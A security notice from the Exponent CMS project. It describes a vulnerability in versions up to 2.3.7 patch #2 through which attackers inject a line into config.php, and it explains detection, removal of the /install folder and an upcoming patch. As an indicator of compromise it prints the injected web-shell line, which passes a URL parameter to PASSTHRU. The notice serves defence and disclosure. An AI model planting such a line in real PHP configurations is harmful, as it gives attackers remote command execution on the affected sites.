Security Notice: Closing an Exponent Security Vulnerability
We've been notified of a security vulnerability which could compromise your Exponent CMS installation. This vulnerability applies to all versions of Exponent 2.x up to v2.3.7 patch #2. The immediate fix is to rename the /install folder to something else, or remove/delete it. Though we've been working hard to close Cross-Site Scripting (XSS) vulnerabilities, this one could be more permanent and seems to result from an anomaly within PHP which allows a string variable to be internally interpreted and processed as an array thereby masking the payload.
To see if your site has been infected, you'll need to view the /conf/config.php file in older versions or the /framework/conf/config.php in newer installations. If infected, you will find an additional line at or near the bottom of that file which is not simply a 'define', but will have two commands on the same line separated by a semi-colon with the remainder of the line commented out. Normally a line in config.php would look something like:
define("DB_ENGINE",'mysqli');
however, an infected line would look similar to:
define("",""); PASSTHRU($_GET[",'"]); // ');
The immediate fix to this type infection is to remove/delete the affected line from the config.php file
We'll be shipping a formal fix to this vulnerability within a few days. This patch #3 to v2.3.7 will also include the entire '/install' folder to ensure your v2.3.7 site can be upgraded. The /install folder is needed not only for installations, but is also used for version upgrades, or for running an upgrade script from the Exponent/Super-Admin menu.